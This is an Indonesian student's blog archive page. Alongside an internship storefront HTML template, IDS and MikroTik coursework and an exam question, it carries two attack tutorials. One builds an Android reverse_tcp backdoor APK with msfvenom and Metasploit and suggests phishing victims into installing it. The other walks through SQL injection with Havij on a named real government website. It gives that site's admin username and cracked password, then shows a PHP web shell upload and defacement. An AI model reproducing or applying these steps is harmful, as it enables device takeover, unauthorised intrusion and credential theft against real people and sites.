Ilham – Page 8 – Ilham Idfiana

Magang Minggu 1 & 2 – Membuat Tampilan Header

Posted on January 8, 2021 by Ilham

Pada Magang semester kali ini saya ditugaskan untuk membuat sebuah website toko online di perusahaan yang bernama CV Indotraco HD.

Ringkasan Perusahaan

CV Indotraco HD adalah perusahaan menengah kecil dalam bidang pertanian dengan menjual pestisida dan pupuk kenapa saya join CV Indotraco? Pertama di perusahaan ini belum ada website resmi dan juga website untuk menjual produk yang akan dijual.

Laporan Minggu Pertama dan Kedua yaitu membuat tampilan awal atau index nya

dengan script sebagai berikut

<!DOCTYPE html>

<!– Basic –>

<head>

<!– Mobile Metas –>

<!– Site Metas –>

<title>Plasa Pestisida</title>

<!– Firebase UI –>

<!– Site Icons –>

<!– Bootstrap CSS –>

<!– Site CSS –>

<!– Responsive CSS –>

<!– Custom CSS –>

<!–[if lt IE 9]>

<![endif]–>

</head>

<body>

<!– Start Main Top –>

</div>

</div>

<ul>

<li><a href=”location.php”><i class=”fas fa-location-arrow”></i> Our location</a></li>

<li><a href=”https://wa.me/6289654978059?text=I’m%20interested%20in%20your%20pestisida%20for%20sale”><i class=”fas fa-headset”></i> Contact Us</a></li>

</ul>

</div>

<li>

<i class=”fab fa-opencart”></i> 20% off Entire Purchase Promo code: offT80

</li>

<li>

<i class=”fab fa-opencart”></i> 50% – 80% off on Vegetables

</li>

<li>

<i class=”fab fa-opencart”></i> Off 10%! Shop Vegetables

</li>

<li>

<i class=”fab fa-opencart”></i> Off 50%! Shop Now

</li>

<li>

<i class=”fab fa-opencart”></i> Off 10%! Sho
p Vegetables

</li>

<li>

<i class=”fab fa-opencart”></i> 50% – 80% off on Vegetables

</li>

<li>

<i class=”fab fa-opencart”></i> 20% off Entire Purchase Promo code: offT30

</li>

<li>

<i class=”fab fa-opencart”></i> Off 50%! Shop Now

</li>

</ul>

</div>

<!– End Main Top –>

<!– Start Main Top –>

<!– Start Navigation –>

<!– Start Header Navigation –>

</button>

</div>

<!– End Header Navigation –>

<!– Collect the nav links, forms, and other content for toggling –>

<li class=”nav-item”><a class=”nav-link” href=”about.php”>About Us</a></li>

<li><a href=”shop.php”>Sidebar Shop</a></li>

<li><a href=”shop-detail.php”>Shop Detail</a></li>

<li><a href=”checkout.php”>Checkout</a></li>

<li><a href=”my-account.php”>My Account</a></li>

<li><a href=”wishlist.php”>Wishlist</a></li>

</ul>

</li>

<li class=”nav-item”><a class=”nav-link” href=”gallery.php”>Gallery</a></li>

<li class=”nav-item”><a class=”nav-link” href=”contact-us.php”>Contact Us</a></li>

</ul>

</div>

<!– /.navbar-collapse –>

<!– Start Atribute Navigation –>

<ul>

</a>

</li>

</ul>

</div>

<!– End Atribute Navigation –>

</div>

<!– Start Side Menu –>

</ul>

</li>

</div>

<!– End Side Menu –>

</nav>

<!– End Navigation –>

</header>

<!– End Main Top –>

<!– Start Top Search –>

</div>

<!– End Top Search –>

<!– Start Slider –>

<h1 class=”m-b-20″><strong>Welcome To <br> Plasa Pestisida</strong></h1>

<p class=”m-b-40″>Selamat datang di website plasa pestisida <br> Jika anda ingin beli ada di panel Shop atau tekan Pilihan Shop yang dibawah ini.</p>

</div>

</li>

<h1 class=”m-b-20″><strong>Welcome To <br> Plasa Pestisida</strong></h1>

<p class=”m-b-40″>Selamat datang di website plasa pestisida <br> Jika anda ingin beli ada di panel Shop atau tekan Pilihan Shop yang dibawah ini.</p>

</div>

</li>

<h1 class=”m-b-20″><strong>Welcome To <br> Plasa Pestisida</strong></h1>

<p class=”m-b-40″>Selamat datang di website plasa pestisida <br> Jika anda ingin beli ada di panel Shop atau tekan Pilihan Shop yang dibawah ini.</p>

</div>

</li>

</ul>

</div>

<!– End Slider –>

<!– Start Categories –>

<a class=”btn hvr-hover” href=”#”>Lorem ipsum dolor</a>

</div>

&
nbsp; <div class=”shop-cat-box”>

<a class=”btn hvr-hover” href=”#”>Lorem ipsum dolor</a>

</div>

<a class=”btn hvr-hover” href=”#”>Lorem ipsum dolor</a>

</div>

<!– End Categories –>

</div>

</div>

<!– Start Products –>

<h1>Pestisida & Pupuk</h1>

<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed sit amet lacus enim.</p>

</div>

<button data-filter=”.top-featured”>Top featured</button>

<button data-filter=”.best-seller”>Best seller</button>

</div>

</div>

<ul>

</ul>

</div>

<h4>Lorem ipsum dolor sit amet</h4>

&nbs
p; </div>

</div>

</div>

<ul>

</ul>

</div>

<h4>Lorem ipsum dolor sit amet</h4>

</div>

</div>

<ul>

</ul>

</div>

<h4>Lorem ipsum dolor sit amet</h4>

</div>

</div>

<ul>

</ul>

</div>

<h4>Lorem ipsum dolor sit amet</h4>

</div>

<!– End Products –>

<!– Start Blog –>

<h1>Blog Plasa Pestisida</h1>

<p>Disini adalah berita-berita tentang Plasa Pestisida</p>

</div>

</div>

<h3>Fusce in augue non nisi fringilla</h3>

<p>Nulla ut urna egestas, porta libero id, suscipit orci. Quisque in lectus sit amet urna dignissim feugiat. Mauris molestie egestas pharetra. Ut finibus cursus nunc sed mollis. Praesent laoreet lacinia elit id lobortis.</p>

</div>

</ul>

</div>

</div>

<h3>Fusce in augue non nisi fringilla</h3>

<p>Nulla ut urna egestas, porta libero id, suscipit orci. Quisque in lectus sit amet urna dignissim feugiat. Mauris molestie egestas pharetra. Ut finibus cursus nunc sed mollis. Praesent laoreet lacinia elit id lobortis.</p>

</div>

</ul>

&
nbsp; </div>

</div>

</div>

<h3>Fusce in augue non nisi fringilla</h3>

<p>Nulla ut urna egestas, porta libero id, suscipit orci. Quisque in lectus sit amet urna dignissim feugiat. Mauris molestie egestas pharetra. Ut finibus cursus nunc sed mollis. Praesent laoreet lacinia elit id lobortis.</p>

</div>

</ul>

</div>

<!– End Blog –>

<!– Start Instagram Feed –>

</div>

</div>

</div>

</div>

</div>

</div>

</div>

</div>

</div>

</div>

<!– End Instagram Feed –>

<!– Start Footer –>

<h3>Plasa Pestisida Buka</h3>

<li>Monday – Friday: 08.00am to 05.00pm</li> <li>Saturday: 10.00am to 08.00pm</li> <li>Sunday: <span>Closed</span></li>

</ul>

</div>

<h3>Newsletter</h3>

</div>

<button class=”btn hvr-hover” type=”submit”>Submit</button>

</form>

</div>

<h3>Social Media</h3>

<p>Follow US</p>

<ul>

</ul>

</div>

<hr>

&
lt;h4>About Plasa Pestisida</h4>

<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.</p>

<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p>

</div>

<h4>Information</h4>

<ul>

<li><a href=”about.php”>About Us</a></li>

<li><a href=”contact-us.php”>Customer Service</a></li>

<li><a href=”location.php”>Our Sitemap</a></li>

<li><a href=”#”>Terms & Conditions</a></li>

<li><a href=”#”>Privacy Policy</a></li>

<li><a href=”#”>Delivery Information</a></li>

</ul>

</div>

<h4>Contact Us</h4>

<ul>

<li>

<p><i class=”fas fa-map-marker-alt”></i>Address: CV IndoTraco HD <br>Burujul 1 No 25 depan Airal Depot Isi Ulang<br> Nagarawangi, Cipedes, Kota Tasimalaya </p>

</li>

<li>

<p><i class=”fas fa-phone-square”></i>Phone: <a href=”tel:+62-89654978059″>+62 896 5497 8059</a></p>

</li>

<li>

<p><i class=”fas fa-envelope”></i>Email: <a href=”mailto:[email protected]”>gmail perusahaan</a></p>

</li>

</ul>

</div>

</footer>

<!– End Footer –>

<!– Start copyright –>

<a href=”https://html.design/”>html design</a></p>

</div>

<!– End copyright –>

<!– ALL JS FILES –>

<!– ALL PLUGINS –>

</body>

</html>

Minggu selanjutnya adalah emmbuat fungsionalitas website dan juga membuat sistem database untuk login dan juga user client.

Membuat Aplikasi Backdoor Android Untuk Memonitoring Target

Posted on January 8, 2021 by Ilham

Ringkasan

Pada hari ini dalam senggang, kita akan mempelajari cara meretas perangkat seluler Android menggunakan MSFvenom dan kerangka Metasploit. Kami akan menggunakan MSFvenom untuk menghasilkan payload, menyimpannya sebagai file .apk dan menyiapkan listener untuk kerangka Metasploit. Setelah pengguna / korban mengunduh dan menginstal .apk berbahaya, penyerang dapat dengan mudah mendapatkan kembali sesi di Metasploit. Untuk melakukannya, penyerang perlu melakukan manipulasi psikologis untuk memasang .apk di perangkat seluler korban.

Kami akan mendemonstrasikan ini dengan menggunakan alat-alat berikut

– Kali Linux bisa di vmware / virtualbox

– Perangkat / emulator Android

– Zipalign

– VMware atau VirtualBox (lingkungan virtual)

Setelah penyiapan berikut dikonfirmasi tanpa kesalahan, maka kami siap.

Step 1: Menjalankan Kali Linux
Sebelum kita mulai, mari kita bahas tentang MSFvenom. Ini adalah kombinasi dari MSFpayload dan MSFencode. Alat-alat ini sangat berguna untuk menghasilkan payload dalam berbagai format dan mengenkode payload ini menggunakan berbagai modul encoder.
Menggabungkan kedua alat ini menjadi satu alat sangatlah masuk akal. Ini menstandarkan opsi baris perintah, mempercepat sedikit dengan menggunakan satu contoh kerangka kerja dan menangani semua format keluaran yang mungkin. MSFvenom digunakan untuk membuat payload menembus emulator Android.
Dengan menggunakan MSFvenom, kami membuat file .apk muatan. Untuk ini, kami menggunakan perintah berikut:
Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android_shell.apk

Figure 1: MSFvenom payload

-p — Payload to be used

LHOST — Localhost IP to receive a back connection (Check yours with ifconfig command)

LPORT — Localhost port on which the connection listen for the victim (we set it to 4444)

R — Raw format (we select .apk)

Location — To save the file

Note: Dalam perintah ini, kami telah menggunakan alamat lokal karena kami mendemonstrasikan di lingkungan lokal. Untuk tampil di jaringan publik, Anda harus memasukkan alamat publik Anda di LHOST dan mengaktifkan penerusan port di router.
Setelah perintah ini, sekarang Anda dapat mencari file Anda di desktop dengan nama android_shell.apk.

Figure 2: APK file sudah dibuat

Setelah kami berhasil membuat file .apk, kami perlu menandatangani sertifikat karena perangkat seluler Android tidak diizinkan untuk memasang aplikasi tanpa sertifikat yang ditandatangani dengan benar. Perangkat Android hanya memasang file .apk bertanda tangan / sign certificate.
Dibutuhkan sign certificate .apk file secara manual di kali linux :

Keytool (preinstalled)

jar signer (preinstalled)

zipalign (need to install)

Untuk install sign certificate pada .apk kita maka gunakan perintah sebagai berikut
Terminal: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Figure 3: Keytool

Lalu gunakan perintah dibawah sebagai berikut
Terminal: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

Figure 4: Install jarsigner .apk

Selanjutnya adalah gunakan terminal dibawah
Terminal : jarsigner -verify -verbose -certs android_shell.apk

Figure 5: Verifikasi.apk menggunakan JARsigner

Apabila belum install zipalign maka harus diinstall dulu dengan perintah seperti gambar dibawha

Figure 6: Instalasi Zipalign

Lalu gunakan perintah zipalign terhadap .apk yang sudah di buat tadi
Terminal: zipalign -v 4 android_shell.apk singed_jar.apk

Figure 7: Verifikasi the .apk menggunakan Zipalign

Sekarang kami telah berhasil menandatangani file android_shell.apk kami dan dapat dijalankan di lingkungan Android apa pun. Nama file baru kami adalah singed_jar.apk setelah verifikasi dengan Zipalign.

Figure 8: .apk target sudah terinstall

Tahap selanjutnya adalah menggunakan aplikasi metasploit untuk generate payload nya
Terminal: msfconsole

Figure 9: Starting Metasploit

Metasploit begins with the console.

Figure 10: Tampilan Metasploit

Sekarang luncurkan atau jalankan exploit multi/handler dan gunakan android payload untuk bisa mendapatkan isi dari targetnya atau bisa dikontrol menggunakan metasploit.
Terminal: use exploit/multi/handler

Figure 11: Setup exploit

Selanjutnya, setel opsi untuk payload, IP listener (LHOST) dan listener PORT (LPORT). Kami telah menggunakan IP localhost, nomor port 4444 dan payload android / meterpreter / reverse_tcp saat membuat file .apk dengan MSFvenom.
Note : Untuk alamat ip disesuaikan alamat ip dari hp target atau harus dalam satu jaringan sebagai contoh menggunakan Wifi untuk mengetahui alamat ip dari target silahkan gunakan aplikasi Ip-checker dsb

Figure 12: Setup the exploit

Kemudian kita berhasil menjalankan exploit untuk reverse connection.
Terminal: run

Figure 13: Eksekusi exploit

Selanjutnya, kita perlu menginstal file .apk Android yang berbahaya ke perangkat seluler korban. Di lingkungan kami, kami menggunakan perangkat Android versi 8.1 (Oreo). Penyerang dapat membagikan APK Android berbahaya kepada korban dengan bantuan rekayasa sosial / phishing email.
Sekarang saatnya menyiapkan emulator Android dengan cepat (jika Anda tidak memiliki perangkat Android). Langkah-langkah untuk mengonfigurasi emulator Android:
Unduh file gambar untuk proyek kode Android x86 dari situs proyek Google Code (https://code.google.com/archive/p/android-x86/downloads)
Buat mesin virtual menggunakan kernel versi 2.6x lain di workstation VMware
Pasang file ISO ke opsi VMware
Selesaikan proses dan jalankan mesin dalam mode LIVE
Siapkan perangkat Android
Siapkan akun Google
Catatan: Proyek Android x86 dapat menghubungkannya ke jaringan lokal dengan adaptor Ethernet (VMnet8). Jika Anda menggunakan emulator lain untuk menembus perangkat Android, Anda juga dapat menggunakan emulator Android CLI.
Setelah mengatur emulator Android di VM, kami akan mengunduh file dari tautan cloud yang telah kami buat di Kali Linux dan dikirim melalui email ke akun korban.

Figure 14: Spam email

Download file yang tadi .apk yang sudah kita buat lalu install kan pada Android tapi disarankan jangan hp langsung, gunakan emulator untuk pengujian.

Figure 15: Download file .apk

Jalankan .apk tersebut

Figure 16: Install aplikasi .apk

Jika sudah di install pada target maka kita kembali lagi ke kali linux
Kita bisa lihat target sudah bisa masuk pada gambar dibawah

Figure 17: Target

Untuk mengetahui target gunakan perintah ? atau help command, kamu akan melihat banyak perintah yang bisa digunakan untuk target
Note : Gunakan Aplikasi ini pada emulator seperti nox, bluestack dsb. dikarenakan akan terdampak bahaya apabila digunakan langsung pada hp android.
terima kasih
sekian

Tugas Keamanan Jaringan ~ IDS

Posted on December 10, 2020 by Ilham

Nama : Ilham Idfiana

Kls : D3TK-42-02

NIM : 6702184010

Jelaskan apa fungsi Intrusion Detection System (IDS) pada sebuah sistem keamanan jaringan!
Jelaskan apa perbedaan IDS dan IPS!
Pada proses deteksi serangan dikenal istilah False Positif dan False Negatif. Jelaskan apa yang dimaksud dengan False Positif dan False Negatif!
Jelaskan apa yang dimaksud dengan metode deteksi Signature Based!
Jelaskan apa yang dimaksud dengan metode deteksi Anomaly Based!
Sebutkan 3 contoh tools IDS!

Jawaban

1. Intrusion Detection System (disingkat IDS) adalah sebuah metode yang dapat digunakan untuk mendeteksi aktivitas yang mencurigakan dalam sebuah sistem atau jaringan. IDS dapat melakukan inspeksi terhadap lalu lintas inbound dan outbound dalam sebuah sistem atau jaringan, melakukan analisis dan mencari bukti dari percobaan intrusi (penyusupan).

2. IDS (intrution detection system) adalah sebuah sistem yang melakukan pengawasan terhadap lalu lintas (traffic) jaringan dan pengawasan terhadap kegiatan kegiatan yang mencurigakan didalam sebuah sistem jaringan. intrusion prefention system

(IPS), adalah pendekatan yang sering digunakan untuk membangun sistem keamanan komputer,IPS mengkombinasikan teknik firewall dan metode IDS dengan baik

3. False positif – adalah peringatan yang dihasilkan oleh IDS karena telah mendeteksi adanya serangan yang valid terhadap sistem yang kita monitor, tetapi serangan itu sendiri tidak valid. Atau dengan kata lain, kita mendapat laporan serangan, padahal itu bukan serangan. Ini adalah masalah bagi kita karena banyaknya peringatan yang dibuat oleh IDS padahal serangan yang sebenarnya tidak terjadi. False positif bisa saja terjadi karena adanya serangan pada sistem yang tidak di monitor.

False negatif – adalah serangan yang benar-benar terjadi tetapi tidak terdeteksi oleh IDS. IDS bisa melewatkan serangan karena menganggap serangan yang dilakukan tidak sesuai dengan aturan yang ada (rule), atau karena terlalu banyak serangan, atau bisa juga karena penyerang berhasil melumpuhkan IDS. Dampak dari false negatif ini artinya penyerang berhasil melewati IDS, sama artinya dengan ada yang menyerang kita, tapi kita tidak menyadarinya!

4. Signature detection – IDS yang bekerja menggunakan signature (rule/peraturan) akan mendeteksi serangan jika ada traffic network yang masuk ke dalam daftar serangan. Signature – lah yang menentukan paket yang masuk ke network tersebut merupakan serangan atau biasa disebut “bad traffic”. Kekurangan dari metode ini adalah bahwa IDS hanya bisa mendeteksi suatu serangan yang telah terdaftar sebelumnya di dalam signature. Oleh karena itu, metode ini akan kesulitan menghadapi daftar serangan jenis baru. Bila kita menggunakan signature detection mungkin akan berdampak sedikitnya peringatan false positif tetapi banyak false negatif.

5. Anomaly detection – IDS yang menggunakan anomaly detection bekerja menggunakan cara yang berbeda. IDS akan mengenal traffic “normal” jaringan kita dan akan mulai mengingatkan kita bila ternyata ada traffic yang “abnormal”. Masalahnya adalah, sesuatu yang baru atau berbed
a juga bisa dianggap abnormal. Jadi jika kita menggunakan metode ini IDS akan memberikan sedikit false negatif tetapi banyak false positif.

6. Zeek, Snort, Kismet

Praktikum

Install Snort Aplikasi

Lalu Jalankan Snorting

Gambar diatas adalah prses dari snort dari pc

Cara Membuat SSL Sendiri Mikrotik

Posted on December 9, 2020 by Ilham

A. Pengertian SSL
Sertifikat SSL atau yang lebih dikenal dengan SSL adalah singkatan dari Secure Socket Layer. Apabila sistem keamanan ini ditambahkan pada website Anda, maka URL website akan berubah menjadi HTTPS. Tujuan utama pemasangan SSL adalah sebagai pengaman pertukaran data yang terjadi melalui jaringan internet.

Di awal tadi kami sempat menyinggung, apa beda SSL dengan TLS? Sebenarnya, kini SSL sudah tidak digunakan sama sekali dan sudah digantikan oleh TLS.

Walaupun begitu, karena kebanyakan orang sudah terlalu familiar dengan istilah SSL, perusahaan tetap menggunakan istilah tersebut. Padahal pada dasarnya kini fitur enkripsi yang disediakan adalah TLS.

Keduanya sama-sama mengamankan transfer data di dalam website. Namun, teknologi TLS lebih baik karena lebih baru dan merupakan upgrade dari SSL. Jadi Anda tidak perlu khawatir dengan perbedaan istilah tersebut.

Langsung aja caranya

1. Membuat SSL

a. Sebelum membuat ssl bikin server untuk menampung ssl dan tampilan hotspot disini saya menggunakan mikrotik untuk membuat tampilan login hotspot dan ssl

b. Pertama buka mikrotik “Winbox”

c. Lalu buka menu terminal dan ketikkan
/certificate

add name=ca-template common-name=myCa key-usage=key-cert-sign,c

rl-sign

sign ca-template name=myCa
add name=Hotspot-template common-name=Hotspot
sign Hotspot-template ca=myCa name=Hotspot
set [find name=Hotspot] trusted=yes

d. Lalu jika ingin melihat hasil dari certificatenya buka menu system > certificate

2. Pengujian Ke Web browser & setting hotspot

a. Disini saya menggunakan ip 192.168.1.1 untuk server mikrotiknya sedangkan ke internet menggunakan NAT.

Untuk server konfigurasi hotspotnya

Pada gambar diatas buka Ip > Hotspot > Pilih server Profile > lalu pilih hsprof1 dan buka tab bagian login pilih https dan isi ssl certificatenya dngan hotspot, apabila belum ada hsprof1nya bisa buka menu Ip > Hotspot > Servers > Hotspot Setup.

b. Pengujian Di Web Browser

Pada gambar diatas adalah ketika mengunjungi website atau ip 192.16
8.1.1 maka akan ada tampilan connection not secure karena ssl tersebut tidak terdaftar untuk public hanya untuk local saja dan tingkat keamanannya juga sangat rentan.

Referensi :
– https://www.niagahoster.co.id/blog/apa-itu-ssl/
– https://www.youtube.com/watch?v=0PS5YRHekGM&feature=youtu.be

Tugas Keamanan Jaringan ~ Malware

Posted on November 20, 2020 by Ilham

Malware RAT

Nama : Ilham Idfiana

KLS : D3TK-42-02

NIM : 6702184010

Teori

Jelaskan apa yang dimaksud dengan analisa malware dengan metoda statik!
Jelaskan apa yang dimaksud dengan analisa malware dengan metoda dinamis!
Jelaskan apa yang dimaksud dengan reverse engineering!
Sebutkan 5 tools yang dapat digunakan untuk melakukan analisa malware!
Jelaskan apa saja tahapan yang harus dilakukan dalam melakukan analisa malware!
Jelaskan bagaimana cara membuat “safe environment” untuk melakukan analisa malware!
Jelaskan apa kegunaan dari Sandbox!
Jelaskan bagaimana cara antivirus mendeteksi malware!

Jawaban

1. Static Analysis : Merupakan metode yang digunakan untuk melakukan analisa malware dengan cara mengamati secara langsung kode sumber (source code) malware tersebut. Dalam mengamati kode sumber malware, terdapat teknik yang umumnya digunakan, yaitu Reverse Engineering.

2. Dynamic Analysis : Merupakan metode yang digunakan untuk melakukan analisa terhadap malware dengan mengamati kinerja sistem yang dapat terlihat dari perilaku sistem sebelum malware dijalankan dengan perilaku sistem setelah malware tersebut dijalankan pada sistem tersebut. Metode dynamic analysis umumnya menggunakan software virtual seperti VirtualBox, VMWare dan lain-lain, sehingga apabila malware yang dijalankan tersebut ternyata merusak sistem, maka sistem utama tidak mengalami kerusakan akibat malware tersebut.

3. reverse engineering adalah proses penemuan prinsip-prinsip teknologi dari suatu perangkat, objek, a
tau sistem melalui analisis strukturnya, fungsinya, dan cara kerjanya. Proses ini biasanya melibatkan pemisahan (perangkat mesin, komponen elektronik, program komputer, atau zat biologi, kimia, atau organik) dan analisis terhadap cara kerjanya secara terperinci, atau penciptaan perangkat atau program baru yang memiliki cara kerja yang sama tanpa memakai atau membuat duplikat (tanpa memahami) benda aslinya. Pada dasarnya, prinsip rekayasa balik sama dengan penelitian ilmiah, namun objek yang ditelaah berbeda. Objek yang ditelaah pada riset ilmiah biasanya adalah fenomena alami, sedangkan pada rekayasa balik, objek yang ditelaah adalah benda buatan manusia.

4. Autopsy, Binhash, Chaos Reader, antiword, sigtool

5. Untuk melakukan analisa malware pertama kita download aplikasi untuk membuat malware ataupun download malwarenya, untuk pengujian malware disarankan harus menggunakan virtualisasi agar aman untuk digunakan, lalu capture hasil dari virus tersebut atau analisis di website online untuk aplikasinya

6. Untuk safe environment atau pun pengujian langsung malwarenya adalah menggunakan virtualisasi agar meminimalisir terjadinya terkena malware secara langsung

7. Sandbox adalah mekanisme keamanan untuk memisahkan program yang sedang berjalan. Istilah ini acap digunakan untuk mengeksekusi kode yang belum diuji, atau program tidak tepercaya yang berasal dari pihak ketiga dan pemasok yang tidak terverifikasi, serta pengguna dan situs web yang tidak tepercaya.

Teknologi sandbox sering kali digunakan untuk menguji program tidak terverifikasi yang mungkin mengandung virus atau kode jahat lainnya, tanpa harus membiarkan perangkat lunak tamu membahayakan perangkat penyedia.

8. Cara antivirus bekerja adalah ketika melakukan scanning file maka aakan mendeteksi apakah file tersebut terinfeksi sebuah virus atau tidak biasanya yang sering ampuh untuk mendeteksi file virus adalah windows defender dikarenakan ada informasi jelas yang sudah menginfeksi file tersebut dan bisa menghilangkannya.

Praktek

Buatlah Sebuah Malware dengan tools 888 RAT, pada gambar dibawah ini adalah proses pembuatan RAT dengan hasil akhirnya adalah apk atau format aplikasi pada android

Dan ketika sudah di scan di website hybrid analysis ditemukan bahwa apk tersebut memiliki malware Trojan pada scan melalui ikarus

Cara deface web menggunakan Havij pro

Posted on October 24, 2020 by Ilham

Apa itu deface?

Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di

dalam sebuah aplikasi.

Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja

server lambat dan lama-kelamaan server akan crash dan down.

Itulah deface.

ok langsung saja

peralatan perang yang dibutuhkan

1.acunetix –> download

2.havij pro –> download

3.admin login finder –> download

4.shell backdoor –> download

1.scanning web korban dengan acunetix disini korban saya http://www.vsi.esdm.go.id maaf ya adamin cuman buat pembelajaran

scanning sampai selesai setelah itu muncul hole atau kerentanan web tersebut

hmmm sepertinya disisni saya akan mengeksekusi web tersebut dengan teknik sql injection

klik sql injection lalu pilih parameternya lalu klik dan muncul keterangan di sebelah kanan tampilan acunetix
> lalu launch the attack with http editor

setelah di klik launch the attack with http editor maka muncul jendela baru

copy path injection
disini path korban saya /peringatan_dini.php?bulan=9-2+4-2-2&tahun=2012

lalu pastekan pada adress bar mozilla dan copy lagi semuanya pada adress bar
jadinya vsi.esdm.go.id/peringatan_dini.php?bulan=9-2+4-2-2&tahun=2012 kayaknya ini bener – bener rentan sql injection liat gambar di bawah
artikelnya kosong

sekarang waktunya untuk menyuntikkan sql dengan tool havij yang sudah kalian download tadi
buka toolnya

lalu pastekan url korban yang telah anda copykan tadi pada kotak target lalu analyze

tunggu sampai scanning selesai dan sukses injection
apabila success injection muncul nama database nya dan tombol table telah di buka

alu klik tombol table dan pilih get tables untuk mendapatkan table sql

lau muncul nama-nama table nya
pilih sekiranya dimana letak admin login databasenya
disini letak admin loginya berada pada table users
lalu centang table users lalu klik GET COLOUMNS

setelah mendapatkan coloumn sekarang kita mencari user dan pass loginya dengan men ceklist username dan passwordnya
lalu klik GET DATA

tunggu …….

lalu muncul duehh user loginya admin

hmmm…. kayaknya ini password masih di enskripsi hash md5
tapi jangan patah semangat coba kita dekript dulu make tool decrypt online atau john the ripper
juga bisa make google database agar pekerjaan kita lebih cepat

disini kita coba decrypt login admin yana soalnya akses levelnya juga admin dan password di google databasenya juga tersedia
kita decrypt 930d35238e22c6bf400a959e470d4949 dengan google database
buka google lalu pastekan hash md5 pada kolom search

lalu google akan mencari pilih salah satu dari temuan google
dan akhrinya berhasil menemukan hash tersebut passwornya adalah merapi jadi loginya user = yana pass = merapi

sekarang password sudah ketemu sekarang yang diakukan adalah mencari halaman ogin web korban dengan tool admin login finder yang telah kalian download tadi buka toolnya dan masukkan alamat url korban pada kolom lalu scan

NAHH . . sudah ketemu loginya sekarang kita coba masuk sebagai admin
bersiap siaplah
login dengan username & password yang telah kita temukan tadi

dan sukses kita dah masuk sebagai admin

sekarang apa yang kita lakuakan setelah masuk sebagai admin
yups . . bener sekali tujuan kita disini adalah merubah tampilan depan web
jadi yang kita lakukan adalah menanam shell backdoor pada website korban

apa itu shell backdoor

buat yang suka deface pasti sudah tau tentang Backdoor “pintu be
lakang” alias jalan pintas buat akses log on situs web, gak cuma itu sih kita juga bisa leluasa kalo mengexploitasi web dengan menggunakan Backdoor ( shell ) tanpa harus login sebagai administrator kita punya kuasa yang sama dengan admin aselinya hehe,

kalau web menggunakan cms joomla bisa baca-baca dulu di –>Upload shell pada joomla

kalau web menggunakan cms wordpress bisa di lihat di –> Upload shell pada wordpress

maka kita harus mencari sendiri servis uploadnya
biasanaya terdapat pada upload image

lets go

disini letak upoad image nya berada pada static content > header

lalu pilih tambah header dan edit judul dan browse shell backdoor yang telah kalian download tadi

JANGAN LUPA SHELL BACKDOOR DIRUBAH EKSTENSI NYA YANG TADINYA .PHP DIRUBAH MENJADI .JPG

pilih shell.jpg yang telah kalian rubah ekstensinya

setelah selesai memilih shell jangan upload dulu kita install dulu addon tamper data
apa bila belum punya tamper data silahkan download di http://addons.mozilla.org/id/firefox/addon/tamper-data/eula/79565?src=dp-btn-primary

setelah itu install dan buka tamper data pada mozilla tools > tamper data

lalu klik start

lalu segera balik ke halaman upload shell.jpg tadi dan segeralah upload
lalu muncul dialog pada tamper dta klik TAMPER

lalu pada layar jendela tamper popup di sebelah kanan layar post_data cari shell.jpg disini saya menggunakan becak.jpg
lalu cari becak.jpg setelah ketemu rubah ekstensi menjadi .PHP jadinya becak.php

dan sukses di upload shell.php kita
dan sekarang kita mencari letak shellnya untuk di panggil

buka lagi judul yang telah kita buat tadi klik edit

lalu klik kanan pada gambar dan pilih copy image location

setelah di copy paste pada adress bar mozilla jadinya

http://vsi.esdm.go.id/foto_banner/becak.php

dan berhasil kita sudah masuk pada shell backdoor

sekarang kita pergi ke halaman depan web tersebut cari index.php / index.html website

dan rubah source kode pada index.php dengan mengkik edit

hapus semua code dalam index.php rubah dengan source code html kalian atau bisa langsung upload file index.html kalian dan lihat hasinya

Soal Ujikom TKJ SMK 2017

Posted on September 25, 2020 by Ilham

Dalam kegiatan uji kompetensi ini anda bertindak sebagai Teknisi Jaringan. Tugas anda sebagai seorang Teknisi Jaringan adalah merancang bangun dan mengkonfigurasi sebuah Wifi Router berfungsi sebagai Gateway Internet, Web Proxy, DHCP Server dan Firewall, kemudian internet tersebut dishare ke client melalui jalur kabel dan wireless.

Dengan Opsi konfigurasi sebagai berikut:

Konfigurasi Wifi Router

1. Sistem operasi = Mikrotik RouterOS

2. DNS = Sesuai dengan DNS yang diberikan ISP

3. NTP = Yes

4. WebProxy = Yes

5. Cache Administrator = [email protected]

Ether1:

6. IP Ether1 = Sesuai dengan Network yang diberikan ISP

7. Gateway = Sesuai dengan IP yang diberikan oleh ISP

Ether2:

8. Terhubung dengan kabel ke switch dan PC

9. IP Ether2 = 192.168.1.1/24

10. DHCP Pool = 192.168.1.2-192.168.1.100

11. STATIC DNS = ketika akses ke http://www.mikrotik.com dialihkan ke website http://bnsp-indonesia.org

12. Buat firewall agar IP 192.168.100.2-192.168.100.50 tidak dapat ping ke router

13. Buat rule agar setiap akses ke router tercatat di logging

14. Buat rule filter yang mengijinkanpermintaan HTTP dan HTTPS dari CLIENT network ke Internet

WLAN 1 (WLAN Interface):

13. IP WLAN 1 = 192.168.2.1/24

14. SSID = nama_peserta@Proxy

15. DHCP Pool = 192.168.2.2-192.168.2.100

16. Blocking Site = http://www.linux.or.id

17. Blocking File = .mp3, .mkv

18. Blocking Content = Block setiap konten yg mengandung kata “mikrotik”

19. Buat firewall yang memblokir akses internet melalui jalur wireless mulai pukul 19:00 (malam)– 07:00 (pagi).

Konfigurasi PC/Laptop Client (Yang tergubung Ether2 melalui Switch)

1. IP LAN = Dinamis

2. Sistem operasi = Windows / Linux

Konfigurasi PC/Laptop Client (Yang tergubung WLAN1 melalui wireless)

1. IP WLAN = Dinamis

2. Sistem operasi = Windows / Linux

Tugas Anda sebagai Teknisi Jaringan adalah :

